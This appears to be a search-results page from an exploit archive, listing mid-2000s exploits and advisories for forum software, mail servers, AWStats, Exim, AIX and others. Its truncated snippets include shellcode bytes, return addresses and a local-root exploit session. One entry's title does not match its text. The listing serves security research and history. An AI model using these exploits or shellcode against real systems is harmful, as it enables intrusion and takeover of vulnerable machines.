1622 matches found
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities
Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.php : if $vboptions'showforumusers' . . . . if $bbuserinfo'userid' . . . . $comma = ', ';...
MyPHP Forum 1.0 - SQL Injection
MyPHP Forum 1.0 - SQL Injection /==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...
MyPHP Forum 1.0 SQL Injection Exploit
No description provided by source. /==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...
Setuid perl PerlIO_Debug() overflow
Exploit for linux platform in category local exploits =================================== Setuid perl PerlIODebug overflow =================================== / Copyright Kevin Finisterre Setuid perl PerlIODebug overflow Tested on Debian 3.1 perl-suid 5.8.4-5 11:07:20 corezion: who is tha man wit...
trn-test.txt
/ /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com / / sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 + mandrake 9.2 = 0xbfffff96 + slackware 10.0.0= 0xbfffff98 + slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 BOO % 128 RET % bfffff84...
AWStats 6.0 6.2 - configdir Remote Command Execution (C)
AWStats 6.0 6.2 - configdir Remote Command Execution C / AwStats exploit by Thunder, [email protected] This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the us...
IEurlflaw.txt
All, The following very simple! code calls a URL in the browser window but fails to update the address bar in IE. Looks like the form submission is suspended with the interrupt of the 'window.alert' call. IE then fails to correctly handle. Might be helpful in facilitating phishing style attacks...
Exim <= 4.41 dns_build_reverse Local Exploit PoC
Exploit for linux platform in category local exploits ================================================ Exim int main int argc, char argv static char shellcode= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"...
Portcullis Security Advisory 05-004
Portcullis Security Advisory Vulnerable System: MediaPartner 5.0 Vulnerability Title: In Place Password Update Process Flawed Vulnerability discovery and development: Portcullis Security Testing Service Affected systems: Emotion MediaPartner Web Server Version 5.0 5.1 not confirmed Details: The...
[EXPL] iWebNegar Configuration Nullification (DoS)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)
/ $Id: raptorudf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $ raptorudf.c - dynamic library for dosystem MySQL UDF Copyright c 2004 Marco Ivaldi This is an helper dynamic library for local privilege escalation through MySQL run with root privileges very bad idea!. Tested on MySQL 4.0.17. Code ripped...
Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)
Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode =...
AIX 5.1 < 5.3 - paginit Local Stack Overflow
/ exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6"...
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
No description provided by source. / RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhoufelixzhou at hotmail dot com Exploit Writer : x90cKyong [email protected]/jyj9782 Testing -----------------------------------------------...
wget 1.9 - Directory Traversal
wget 1.9 - Directory Traversal !/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Min???? jjminar fastmail fm License: Public Domain When wget connects to us, we send it a HTTP redirect constructed so that wget wget will connect the second...
Blog Torrent preview 0.8 - arbitary file download
Intro ----- Blogtorrent is a collection of PHP scripts which are designed to make it simple to host files for transfer via bittorrent. Whilst it is not normal to report security problems in "preview" releases of software this software was covered prominently upon Slashdot and could be widely used...
Aspell (word-list-compress) Command Line Stack Overflow
Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...
WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit
No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...
technote-commandexec.txt
Technote Command Excution Technote Inc. from Korea offers a Site Package which includes a web board. Previous exploit discovered way back on year 2000 focused on a File Disclosure Vulnerability http://www.securityfocus.com/bid/2156/discussion/ However, command execution is also possible using the...